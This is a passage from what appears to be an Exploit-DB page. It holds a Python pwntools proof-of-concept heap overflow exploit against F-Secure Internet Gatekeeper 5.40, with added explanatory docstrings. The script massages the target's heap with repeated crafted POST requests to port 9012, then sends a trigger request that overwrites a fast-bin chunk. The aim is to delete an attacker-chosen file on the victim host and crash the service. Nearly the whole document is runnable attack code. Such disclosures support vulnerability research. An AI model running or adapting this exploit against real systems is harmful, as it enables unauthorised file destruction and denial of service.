F-Secure Internet Gatekeeper 5.40 – Heap Overflow (PoC)

  • 作者: Kevin Joensen
    日期: 2020-02-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47996/
  • # Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
    # Date: 2020-01-30
    # Author: Kevin Joensen
    # Vendor: F-Secure
    # Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
    # CVE: N/A
    # Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html
    
    from pwn import *
    import time
    import sys
    
    
    
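    def send_payload(payload, content_len=21487483844, nofun=False, target=None, port=9012, host_header=None):
        """Open one TCP connection to the gatekeeper and send a raw POST request.

        Args:
            payload: request body. ``bytes`` is sent as-is; ``str`` is encoded
                as latin-1 so one-character padding such as ``"A" * 12`` maps
                1:1 onto bytes (pwntools on Python 3 returns ``bytes`` from
                ``p32``, so mixing the two would otherwise raise TypeError).
            content_len: value written into the ``Content-Length`` header. The
                default is larger than 32 bits and is kept verbatim from the
                original PoC; presumably it is what makes the target mishandle
                the body length (see the reference write-up) -- do not "fix" it.
            nofun: when False (default) two trailing newlines are sent after
                the body; when True the body is the last thing on the wire.
            target: host/IP to connect to; defaults to ``sys.argv[1]`` exactly
                like the original script.
            port: TCP port of the listener (9012 in the original).
            host_header: value of the ``Host`` header. Defaults to
                ``"<target>:<port>"``; the original hard-coded the author's lab
                address ``192.168.0.122:9012`` regardless of the target.

        Returns:
            The open pwntools ``remote`` tube. The caller owns it and is
            responsible for ``close()``.
        """
        if target is None:
            target = sys.argv[1]
        if host_header is None:
            host_header = "{}:{}".format(target, port)
        if not isinstance(payload, bytes):
            payload = payload.encode("latin-1")

        r = remote(target, port)
        try:
            # Bare "\n" line endings are kept as in the original PoC: the
            # target evidently accepts them, and changing the request bytes
            # could disturb the heap layout the massage was tuned against.
            r.send(b"POST / HTTP/1.1\n")
            r.send("Host: {}\n".format(host_header).encode("ascii"))
            r.send("Content-Length: {}\n".format(content_len).encode("ascii"))
            r.send(b"\n")
            r.send(payload)
            if not nofun:
                r.send(b"\n\n")
        except Exception:
            # Do not leak the socket if a send() fails part-way through.
            r.close()
            raise
        return r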
    
    
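    def trigger_exploit(payload_addr=0xdda00771):
        """Send the 512-byte body that performs the fast-bin chunk overwrite.

        Layout (all little-endian 32-bit words, as in the original):
        12 bytes padding, the fake chunk size word 0x1d, 488 bytes padding,
        then ``payload_addr`` and ``payload_addr + 4``.

        Args:
            payload_addr: heap address where the body lands on the target
                (the original comment calls it "Address of payload"). The
                default is the author's value; it is specific to their
                environment and must be re-derived if the target's heap layout
                differs.

        Returns:
            The tube used for the request. The original script never closed
            it explicitly (it was dropped on return); it is returned here so
            the caller can decide when to tear it down.
        """
        print("Triggering exploit")
        payload = b"".join([
            b"A" * 12,              # padding
            p32(0x1d),              # fast-bin chunk size overwrite
            b"A" * 488,             # padding
            p32(payload_addr),      # address of payload
            p32(payload_addr + 4),  # junk
        ])
        return send_payload(payload)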
    
    
    
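    def massage_heap(filename, payload_addr=0xdda00771, rounds=100):
        """Shape the target heap by sending identical 0x300-byte request bodies.

        Each body is three 32-bit words (two zeros "needed to bypass checks"
        per the original, then a pointer to the filename), the NUL-terminated
        ``filename``, and "C" padding up to 0x300 bytes. The pointer is
        ``payload_addr + 12`` because exactly three 4-byte words precede the
        name in the body; with the default address this is the 0xdda0077d the
        original hard-coded. Every request is sent on a fresh connection that
        is closed immediately, with ``Content-Length`` 0x80000.

        Args:
            filename: path on the target that the exploit is meant to remove.
            payload_addr: heap address the body is expected to land at; must
                match the value used by ``trigger_exploit``.
            rounds: number of requests to send (100 in the original).

        Raises:
            ValueError: if ``filename`` does not fit in the fixed 0x300-byte
                body. The original silently produced an oversized body here
                (negative padding count), which defeats the massage.
        """
        print("Trying to massage the heap.....")
        if not isinstance(filename, bytes):
            filename = filename.encode("latin-1")

        header = p32(0x0) + p32(0x0) + p32(payload_addr + 12)
        body = header + filename + b"\x00"
        if len(body) > 0x300:
            raise ValueError(
                "filename too long: at most {} bytes fit in the 0x300-byte body".format(
                    0x300 - len(header) - 1))
        body += b"C" * (0x300 - len(body))

        # The body is loop-invariant, so it is built once above.
        for _ in range(rounds):
            conn = send_payload(body, content_len=0x80000, nofun=True)
            conn.close()
        print("Heap massage done")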
    
    
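    if __name__ == "__main__":
        # Usage: <victim_ip> <file_to_remove>. The target port (9012) and the
        # heap addresses are fixed inside the helper functions.
        if len(sys.argv) != 3:
            print("Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0]))
            print("Run `export PWNLIB_SILENT=1` for disabling verbose connections")
            # Non-zero status so scripted callers notice the bad invocation;
            # the original used the bare site exit() helper, which returns 0
            # and is not available under `python -S`.
            sys.exit(1)
        massage_heap(sys.argv[2])
        time.sleep(1)  # brief pause between the massage and the trigger, as in the PoC
        trigger_exploit()
        # There is no feedback channel: the script cannot confirm the removal
        # or the crash, it only reports that the requests were sent.
        print("Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2]))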